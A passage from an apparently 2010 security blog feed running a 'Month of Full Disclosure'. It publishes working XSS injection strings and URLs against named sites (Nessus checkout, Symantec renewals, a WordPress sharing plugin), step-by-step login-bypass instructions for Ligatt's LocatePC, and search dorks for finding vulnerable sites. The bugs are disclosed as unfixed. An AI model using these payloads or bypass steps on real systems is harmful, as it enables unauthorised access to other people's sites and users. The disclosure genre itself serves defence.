<p>I had originally decided to do a month of Security Site Bugs as most security sites have a higher level of site protection and also they are more of a challenge for a researcher / tester to find bugs on, and lets face it a lot of us  do this for the challenge.</p>
<p>Due to the nature of the security business their sites are usually locked down fairly tight.</p>
<p>However you can still a good few issues here and there.</p>
<p>It would also seem that security sites are just as susceptible to code injections and other types of low hanging fruit.</p>
<p>and with that I give you</p>
<p>Tenable Network Security / Nessus &#8211; All your Base are Belong to Us.</p>
<div class="wp-caption alignnone" style="width: 692px"><img title="Tenable All Your Base" src="http://www.thetestmanager.com/pics/Blog/Nessus All Your Base.png" alt="Nessus All Your Base" width="682" height="768" /><p class="wp-caption-text">Tenable / Nessus All Your Base</p></div>
<p>Bug Details as follows</p>
<p>Well the security isn&#8217;t that bad here, they do block a lot of tags, So this means No Script Tags , No Href tags, No Iframe or Frame Tags, No Img Tags,</p>
<p>So I had to get a little creative and hence you have the popular meme of &#8220;all your base&#8221;</p>
<p>this is done by firstly a Heading Tag which is not blocked and then I&#8217;m allowed to use Div Tags and Object Tags, oh year and I&#8217;m also allowed to close the TextArea Tag.</p>
<p>Once I worked out what I could use I put it all together see below for the injection.</p>
<p>&lt;/TEXTAREA&gt;&lt;div&gt;&lt;h1&gt;The Test Manager Month Of Security Site Bugs&lt;/h1&gt;&lt;object width=&#8221;480&#8243; height=&#8221;385&#8243;&gt;&lt;param name=&#8221;movie&#8221; value=&#8221;http://www.youtube.com/v/8fvTxv46ano&amp;amp;hl=en_GB&amp;amp;fs=1&#8243;&gt;&lt;/param&gt;&lt;param name=&#8221;allowFullScreen&#8221; value=&#8221;true&#8221;&gt;&lt;/param&gt;&lt;param name=&#8221;allowscriptaccess&#8221; value=&#8221;always&#8221;&gt;&lt;/param&gt;&lt;embed src=&#8221;http://www.youtube.com/v/8fvTxv46ano&amp;amp;hl=en_GB&amp;amp;fs=1&#8243; type=&#8221;application/x-shockwave-flash&#8221; allowscriptaccess=&#8221;always&#8221; allowfullscreen=&#8221;true&#8221; width=&#8221;480&#8243; height=&#8221;385&#8243;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;</p>
<p>Now this is just a bit of fun rather than a fully exploitable bug.  The reason is that I could not get it to work from the URL.</p>
<p>To get the XSS to work you firstly need to have an item in your shopping cart and then checkout.</p>
<p>Then once your on the</p>
<p><a target="_blank" href="http://www.thetestmanager.com/blog/goto/https://products.nessus.org/one-page-checkout.asp" title="Nessus Checkout Page"  target="_blank">https://products.nessus.org/one-page-checkout.asp page</a></p>
<p>there is a payment information box. Just put your code into that box and checkout. No need to fill in the rest of the form boxes the injection works when the form reloads.</p>
<p>Enjoy.</p>
<p>Martin H</p>
<p>The Test Manager.</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=WHamykkY6CY:dfmhfzueAkY:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=WHamykkY6CY:dfmhfzueAkY:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?i=WHamykkY6CY:dfmhfzueAkY:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=WHamykkY6CY:dfmhfzueAkY:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?d=qj6IDK7rITs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=WHamykkY6CY:dfmhfzueAkY:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?i=WHamykkY6CY:dfmhfzueAkY:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/TheTestManagersBlog/~4/WHamykkY6CY" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.thetestmanager.com/blog/2010/08/11/full-disclosure-%e2%80%93-nessus-website-vulnerable-to-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.thetestmanager.com/blog/2010/08/11/full-disclosure-%e2%80%93-nessus-website-vulnerable-to-xss/</feedburner:origLink></item>
		<item>
		<title>Full Disclosure – Symantec Website Vulnerable to XSS</title>
		<link>http://feedproxy.google.com/~r/TheTestManagersBlog/~3/T6OVFKHau78/</link>
		<comments>http://www.thetestmanager.com/blog/2010/08/10/full-disclosure-symantec-website-vulnerable-to-xss/#comments</comments>
		<pubDate>Tue, 10 Aug 2010 10:55:20 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Full Disclosure]]></category>
		<category><![CDATA[Month of Full Disclosure]]></category>
		<category><![CDATA[WebAppSec]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.thetestmanager.com/?p=359</guid>
		<description><![CDATA[I saw a post by d3v1l of http://security-sh3ll.blogspot.com/ where he posts a discovery of a cross site scripting issue on the Symantec site. I remembered that I had found a similar issue a while back and hadn&#8217;t got round to disclosing it to them, so I therefore guess its fine to include in the month [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft" title="Symantex XSS (Cross Site Scripting)" src="http://www.thetestmanager.com/pics/Blog/Asci_TTM.png" alt="(Cross Site Scripting)" width="391" height="135" />I saw a post by d3v1l of <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://security-sh3ll.blogspot.com/" title="Security Shell"  target="_blank">http://security-sh3ll.blogspot.com/</a> where he posts a discovery of a <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://security-sh3ll.blogspot.com/2010/08/symantec-website-still-vulnerable-to.html" title="Security Shell Symantec XSS"  target="_blank">cross site scripting issue on the Symantec site</a>.</p>
<p>I remembered that I had found a similar issue a while back and hadn&#8217;t got round to disclosing it to them, so I therefore guess its fine to include in the month of full disclosure.</p>
<p>And with that I give you a<a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://renewals.symantec.com/renewals/application?source_code=ttm%27//--%3E%3C/script%3E%3Cscript%3Ealert(%27TheTestManager.com%20Month%20of%20Full%20Disclosure%20Bugs%27)%3C/script%3E%3Ciframe%20src%20=%22http://www.thetestmanager.com%22%20width=%22100%%22%20height=%22800%22%3E%3C/iframe%3E&amp;entry_point=sym_lrc" title="New Symantec XSS bug"  target="_blank"> new Symantec XSS bug. </a></p>
<div class="wp-caption alignnone" style="width: 693px"><img class="  " title="Symantec XSS" src="http://www.thetestmanager.com/pics/Blog/Symantec XSS.png" alt="Symantec XSS" width="683" height="400" /><p class="wp-caption-text">Symantec XSS</p></div>
<p>Notes about the bug are as follows.</p>
<p>the issue is caused by Symantec not checking that html comments cannot be ended via user input. So all I had to do was to close the HMTL comment tag and then insert any code I saw fit. In this case a very simple JavaScript Alert box as is the norm with demonstrating XSS bugs and I also added a little Iframe.</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=T6OVFKHau78:Hv3VXCMvBG4:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=T6OVFKHau78:Hv3VXCMvBG4:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?i=T6OVFKHau78:Hv3VXCMvBG4:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=T6OVFKHau78:Hv3VXCMvBG4:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?d=qj6IDK7rITs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=T6OVFKHau78:Hv3VXCMvBG4:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?i=T6OVFKHau78:Hv3VXCMvBG4:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/TheTestManagersBlog/~4/T6OVFKHau78" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.thetestmanager.com/blog/2010/08/10/full-disclosure-symantec-website-vulnerable-to-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.thetestmanager.com/blog/2010/08/10/full-disclosure-symantec-website-vulnerable-to-xss/</feedburner:origLink></item>
		<item>
		<title>Full Disclosure – How not to write a Forms Authentication Process</title>
		<link>http://feedproxy.google.com/~r/TheTestManagersBlog/~3/muxGyq3cSTE/</link>
		<comments>http://www.thetestmanager.com/blog/2010/08/05/full-disclosure-how-not-to-write-a-forms-authentication-process/#comments</comments>
		<pubDate>Thu, 05 Aug 2010 11:11:40 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Full Disclosure]]></category>
		<category><![CDATA[Month of Full Disclosure]]></category>
		<category><![CDATA[Testing]]></category>
		<category><![CDATA[Today's News]]></category>
		<category><![CDATA[WebAppSec]]></category>

		<guid isPermaLink="false">http://www.thetestmanager.com/?p=351</guid>
		<description><![CDATA[This post will be a disclosure on how to not design and implement a login processes. Ligatt Security and Gregory Evans the main man behind Ligatt has come under quite a bit of flack recently for doing things like alegedly making threats to other researchers and also for alleged plagiarism . While all of this Internal Security Industry bickering [...]]]></description>
			<content:encoded><![CDATA[<div class="wp-caption alignleft" style="width: 401px"><img title="The Test Manager" src="http://www.thetestmanager.com/pics/Blog/Asci_TTM.png" alt="The Test Manager" width="391" height="135" /><p class="wp-caption-text">Liggat Authentication Fail</p></div>
<p>This post will be a disclosure on how to not design and implement a login processes.</p>
<p>Ligatt Security and Gregory Evans the main man behind Ligatt has come under quite a bit of flack recently for doing things like alegedly making threats to other researchers and also for alleged plagiarism .</p>
<p>While all of this Internal Security Industry bickering is beyond me and this post.  I would not trust a company with protecting my data if they can&#8217;t even protect their own.</p>
<p>And with that said.  / Month Of Full Disclosure item 3 = Ligatt Security and how not to write an Authentication Process.</p>
<p><a title="Ligatt Security Auth Bypass" href="/Disclosure/MoFD3.txt" target="_blank">Text Version Here</a></p>
<div id="_mcePaste">Ligat Security &#8211; Authentication Bypass</div>
<div id="_mcePaste">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</div>
<div id="_mcePaste">Vulnerability ID: Month Of Full Disclosure 3 = MOFD3</div>
<div id="_mcePaste">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</div>
<div id="_mcePaste">Product:	LocatePC</div>
<div id="_mcePaste">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</div>
<div id="_mcePaste">Vendor:	Ligatt Security Inc ( <a target="_blank" href="http://www.thetestmanager.com/blog/goto/https://www.ligattsecurity.com" title="Ligatt Company Site"  target="_blank">https://www.ligattsecurity.com</a>)</div>
<div id="_mcePaste">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</div>
<div id="_mcePaste">Vendor Tag Lines:	Cyber Security is never an issue with LIGATT on your side</div>
<div id="_mcePaste">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</div>
<div id="_mcePaste">Vendor Notification:	05 August 2010</div>
<div id="_mcePaste">Public Disclosure:	05 August 2010</div>
<div id="_mcePaste">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</div>
<div id="_mcePaste">Vulnerability Type:	Authentication Bypass</div>
<div id="_mcePaste">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</div>
<div id="_mcePaste">Status:	Public Disclosure &#8211; Not Fixed, Vendor Alerted,</div>
<div id="_mcePaste">Awaiting Vendor Response</div>
<div id="_mcePaste">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</div>
<div id="_mcePaste">Risk level:	High</div>
<div id="_mcePaste">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</div>
<div id="_mcePaste">Credit:	Martin Hall &#8211; TheTestManager</div>
<div id="_mcePaste">Site = <a target="_blank" href="http://www.thetestmanager.com" title="Test Manager"  target="_blank">http://www.thetestmanager.com</a></div>
<div id="_mcePaste">twitter = <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://twitter.com/thetestmanager" >@thetestmanager</a></div>
<div id="_mcePaste">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</div>
<div id="_mcePaste">Vulnerability Details:</div>
<div id="_mcePaste">If you visit the LocatePc page</div>
<div id="_mcePaste"><a target="_blank" href="http://www.thetestmanager.com/blog/goto/https://www.ligattsecurity.com/locatePC/working/" title="Turn Redirect off in Browser"  target="_blank">https://www.ligattsecurity.com/locatePC/working/</a></div>
<div id="_mcePaste">in a normal browser you will be redirected to the login page.</div>
<div id="_mcePaste"><a target="_blank" href="http://www.thetestmanager.com/blog/goto/https://www.ligattsecurity.com/locatePC/working/login.php" title="Easy to Bypass"  target="_blank">https://www.ligattsecurity.com/locatePC/working/login.php</a></div>
<div id="_mcePaste">However if you visit the same URL in a browser where Follow Redirects is turned off</div>
<div id="_mcePaste">then you will not be redirected and you will be able to use the LocatePC functionality.</div>
<div id="_mcePaste">Instructions Follow for Opera.</div>
<div id="_mcePaste">Click on Tools</div>
<div id="_mcePaste">Click on Preferences</div>
<div id="_mcePaste">Click on Advanced</div>
<div id="_mcePaste">Click on Network</div>
<div id="_mcePaste">Untick &#8220;Enable automatic redirection&#8221;</div>
<div id="_mcePaste">Click on OK</div>
<div id="_mcePaste">Now follow this URL</div>
<div id="_mcePaste"><a target="_blank" href="http://www.thetestmanager.com/blog/goto/https://www.ligattsecurity.com/locatePC/working/" title="Authentication Bypass"  target="_blank">https://www.ligattsecurity.com/locatePC/working/</a></div>
<div>
<div class="wp-caption alignleft" style="width: 440px"><img title="Ligatt Authentication_ByPass" src="http://www.thetestmanager.com/pics/Blog/Authentication_ByPass.png" alt="Ligatt Authentication_ByPass" width="430" height="190" /><p class="wp-caption-text">Ligatt Authentication_ByPass</p></div>
</div>
<div>
<div class="wp-caption alignnone" style="width: 467px"><img title="Show me where that PC is" src="http://www.thetestmanager.com/pics/Blog/Where Is Ligatt.png" alt="Show me where that PC is" width="457" height="313" /><p class="wp-caption-text">Show me where that PC is</p></div>
</div>
<div>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</div>
<div id="_mcePaste">Sample URL&#8217;s</div>
<div id="_mcePaste"><a target="_blank" href="http://www.thetestmanager.com/blog/goto/https://www.ligattsecurity.com/locatePC/working/" title="Not good security"  target="_blank">https://www.ligattsecurity.com/locatePC/working/</a></div>
<div id="_mcePaste">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</div>
<div id="_mcePaste">Solution:</div>
<div id="_mcePaste">Currently I&#8217;m not aware of any vendor-supplied patches or other solutions.</div>
<div id="_mcePaste">If you are aware of more recent information related to this issue please notify me at: martin@hb-help.com</div>
<div id="_mcePaste">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</div>
<div id="_mcePaste">Other Miscellany Information</div>
<div id="_mcePaste"><a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://attrition.org/errata/charlatan/gregory_evans/ligatt02/" title="Further Information on Ligatt"  target="_blank">http://attrition.org/errata/charlatan/gregory_evans/ligatt02/</a></div>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=muxGyq3cSTE:-2nhbSNZHus:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=muxGyq3cSTE:-2nhbSNZHus:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?i=muxGyq3cSTE:-2nhbSNZHus:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=muxGyq3cSTE:-2nhbSNZHus:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?d=qj6IDK7rITs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=muxGyq3cSTE:-2nhbSNZHus:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?i=muxGyq3cSTE:-2nhbSNZHus:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/TheTestManagersBlog/~4/muxGyq3cSTE" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.thetestmanager.com/blog/2010/08/05/full-disclosure-how-not-to-write-a-forms-authentication-process/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.thetestmanager.com/blog/2010/08/05/full-disclosure-how-not-to-write-a-forms-authentication-process/</feedburner:origLink></item>
		<item>
		<title>Full Disclosure – Multiple XSS holes in 1-click Retweet/Share/Like WordPress Plugin</title>
		<link>http://feedproxy.google.com/~r/TheTestManagersBlog/~3/hSOKegvlLf8/</link>
		<comments>http://www.thetestmanager.com/blog/2010/08/04/full-disclosure-%e2%80%93-multiple-xss-holes-in-1-click-retweetsharelike-wordpress-plugin/#comments</comments>
		<pubDate>Wed, 04 Aug 2010 11:09:44 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Full Disclosure]]></category>
		<category><![CDATA[Month of Full Disclosure]]></category>
		<category><![CDATA[Today's News]]></category>
		<category><![CDATA[WebAppSec]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.thetestmanager.com/?p=344</guid>
		<description><![CDATA[1-Click Retweet/Share/Like Lets users Retweet, Share and Like pages from your site back to their Twitter followers and Facebook friends with just one click. The user experience is similar to Facebook Like button but expanded to Twitter and Facebook Share. The above WordPress Plugin has multiple Cross Site Scripting (XSS) Bugs due to the &#8220;fc&#8221; [...]]]></description>
			<content:encoded><![CDATA[<div class="wp-caption alignleft" style="width: 401px"><img title="The Test Manager" src="http://www.thetestmanager.com/pics/Blog/Asci_TTM.png" alt="The Test Manager" width="391" height="135" /><p class="wp-caption-text">Month Of Full Disclosure</p></div>
<p>1-Click Retweet/Share/Like Lets users Retweet, Share and Like pages from your site back to their  Twitter followers and Facebook friends with just one click. <em>The user experience is similar to Facebook Like button but expanded to Twitter and Facebook Share.</em><br />
<em>The above WordPress Plugin has multiple Cross Site Scripting (XSS) Bugs due to the </em>&#8220;fc&#8221; the &#8220;fs&#8221; and also the &#8220;fblname&#8221; Parameters not correclty sanitising data input</p>
<p>This was discovered in a routine security check on my own site, where up until yesterday I was like hundreds of other wordpress sites running the above plugin.</p>
<p>The plugin does not integrate whoely with the worpress blog and instead it calls home via an IFrame which is where the XSS hole exists.</p>
<p>Every site which has this plugin would therefore call the vunerable URL however that URL due to being an Iframe exists on the vendors site. <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://www.linksalpha.com" title="Links Alpha"  target="_blank">(http://www.linksalpha.com)</a></p>
<p>This mitigates the risk of the WordPress Plugin against the site hosting it. However due to poularity of the plugin, it is deemed still to be a medium risk issue. Plus the fact that there may and most likely are other issues with the plugin which I have not taken the time to research.</p>
<p>See below for the disclosure.</p>
<p><a target="_blank" href="http://www.thetestmanager.com/Disclosure/MoFD2.txt" title="Links Alpha Full Disclosure"  target="_blank">Text Version Here</a></p>
<p>XSS vulnerability in Links Alpha WordPress Plugin<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Vulnerability ID: Month Of Full Disclosure = MOFD2<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
Product:    1-click Retweet/Share/Like<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Vendor:    Links Alpha (<a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://wordpress.org/extend/plugins/1-click-retweetsharelike/stats/" title="Wordpress Plugin"  target="_blank"> http://wordpress.org/extend/plugins/1-click-retweetsharelike/stats/</a><br />
or <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://www.linksalpha.com/" title="Links Alpha"  target="_blank">http://www.linksalpha.com/</a>)<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Vulnerable Version:    2.0.1 Which is current version and Probably Prior Versions<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Vendor Notification:    03 August 2010<br />
Public Disclosure:    03 August 2010<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Vulnerability Type:    XSS (Cross Site Scripting)<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Status:    Public Disclosure &#8211; Not Fixed, Vendor Alerted,<br />
Awaiting Vendor Response<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Risk level:    Medium<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Credit:    Martin Hall &#8211; TheTestManager<br />
Site = <a target="_blank" href="http://www.thetestmanager.com" >http://www.thetestmanager.com</a><br />
twitter = <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://twitter.com/thetestmanager" title="The Test Manager"  target="_blank">@thetestmanager</a><br />
Vulnerability Details:<br />
There exists multiple XSS errors in 1-click Retweet/Share/Like WordPress Plugin.<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Potential Users Affected = minimum = ??? users<br />
It&#8217;s a WordPress Plugin which is installed to sites on average 300-400 times a week<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Dork to find Vulnerable Sites (2)<br />
inurl:http://www.linksalpha.com/social?link=<br />
or<br />
src=&#8221;http://www.linksalpha.com/social?link=<br />
Because it loads on sites in an Iframe the dork is not straight forward.<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Sample URL<br />
<a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://www.linksalpha.com/social?link=http%3A%2F%2Fsimplestrength.com%2F2010%2F06%2Fwarriors-come-out-to-play%2F&amp;fc=28a2ttm--%22%3E%3Cscript%3Ealert%28%22TheTestManager.com-%20Month%20of%20Full%20disclosure%22%29%3C/script%3E&amp;fs=arial&amp;fblname=like" title="Wordpress Plugin XSS Bug"  target="_blank">http://www.linksalpha.com/social?link=http%3A%2F%2Fsimplestrength.com%2F2010%2F06%2Fwarriors-come-out-to-play%2F&amp;fc=28a2ttm&#8211;%22%3E%3Cscript%3Ealert%28%22TheTestManager.com-%20Month%20of%20Full%20disclosure%22%29%3C/script%3E&amp;fs=arial&amp;fblname=like</a><br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Solution:<br />
Currently I&#8217;m not aware of any vendor-supplied patches or other solutions.<br />
If you are aware of more recent information related to this issue please notify me at: martin@hb-help.com</p>
<p>Users are recommended to use NoScript or other XSS mitigating software<br />
Admins are adviced to keep an eye out for an update to the plugin.<br />
(Although as the issues affects code on LinksAlpha Site they should be able to fix the issue without a WordPress Plugin Update)<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Other Miscellany Information<br />
N/A</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=hSOKegvlLf8:-MLUC2T6vTY:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=hSOKegvlLf8:-MLUC2T6vTY:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?i=hSOKegvlLf8:-MLUC2T6vTY:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=hSOKegvlLf8:-MLUC2T6vTY:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?d=qj6IDK7rITs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=hSOKegvlLf8:-MLUC2T6vTY:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?i=hSOKegvlLf8:-MLUC2T6vTY:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/TheTestManagersBlog/~4/hSOKegvlLf8" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.thetestmanager.com/blog/2010/08/04/full-disclosure-%e2%80%93-multiple-xss-holes-in-1-click-retweetsharelike-wordpress-plugin/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.thetestmanager.com/blog/2010/08/04/full-disclosure-%e2%80%93-multiple-xss-holes-in-1-click-retweetsharelike-wordpress-plugin/</feedburner:origLink></item>
		<item>
		<title>Full Disclosure – Multiple XSS holes in FuseTalk Forum Software</title>
		<link>http://feedproxy.google.com/~r/TheTestManagersBlog/~3/YVspAWrWoJk/</link>
		<comments>http://www.thetestmanager.com/blog/2010/08/03/full-disclosure-multiple-xss-holes-in-fusetalk-forum-software/#comments</comments>
		<pubDate>Tue, 03 Aug 2010 10:26:44 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Full Disclosure]]></category>
		<category><![CDATA[Month of Full Disclosure]]></category>
		<category><![CDATA[WebAppSec]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.thetestmanager.com/?p=334</guid>
		<description><![CDATA[***EDIT*** I received notification from FuseTalk that the below issues should now be fixed on their site. This should mean that patch should be rolled out to customer sites in the near future. With this in mind I have agreed to their request to remove references to the names of their customers from my post. [...]]]></description>
			<content:encoded><![CDATA[<div class="wp-caption alignleft" style="width: 401px"><br />
<img title="The Test Manager" src="http://www.thetestmanager.com/pics/Blog/Asci_TTM.png" alt="The Test Manager" width="391" height="135" /><p class="wp-caption-text">The Test Manager</p></div>
<p>***EDIT***</p>
<p>I received notification from FuseTalk that the below issues should now be fixed on their site. This should mean that patch should be rolled out to customer sites in the near future.</p>
<p>With this in mind I have agreed to their request to remove references to the names of their customers from my post.</p>
<p>***END EDIT***</p>
<p>Fuse Talk is a forum software widely used on the web.</p>
<p>Yesterday I found multiple XSS holes while browsing the<a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://supportforums.sunbeltsoftware.com" title="SunBelt Forums"  target="_blank"> </a>******* Forum site.</p>
<p>******* uses FuseTalk as it&#8217;s forum software.</p>
<p>Now there are a few strange things  here.</p>
<p>Firstly ******* is a security firm and you would have thought that they would have picked this up, or at least carried out a review of any software before adding it to their site.  The other strange issue is that the software vendor FuseTalk is not even running the latest version of the software on their own site.</p>
<p>Anyway see below for the disclosure.</p>
<p><a target="_blank" href="http://www.thetestmanager.com/Disclosure/MoFD1.txt" >Text Version Here</a></p>
<p>XSS vulnerability in FuseTalk Forums<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Vulnerability ID: Month Of Full Disclosure 1 = MOFD1<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
Product:    FuseTalk<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Vendor:    FuseTalk Inc</p>
<p>( <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://www.fusetalk.com/Company/AboutFuseTalk/tabid/111/Default.aspx" title="About FuseTalk"  target="_blank">http://www.fusetalk.com/Company/AboutFuseTalk/tabid/111/Default.aspx</a> )<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Vulnerable Version:    4.0 Which is current version and Probably Prior Versions<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Vendor Notification:    02 August 2010<br />
Public Disclosure:    02 August 2010<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Vulnerability Type:    XSS (Cross Site Scripting)<br />
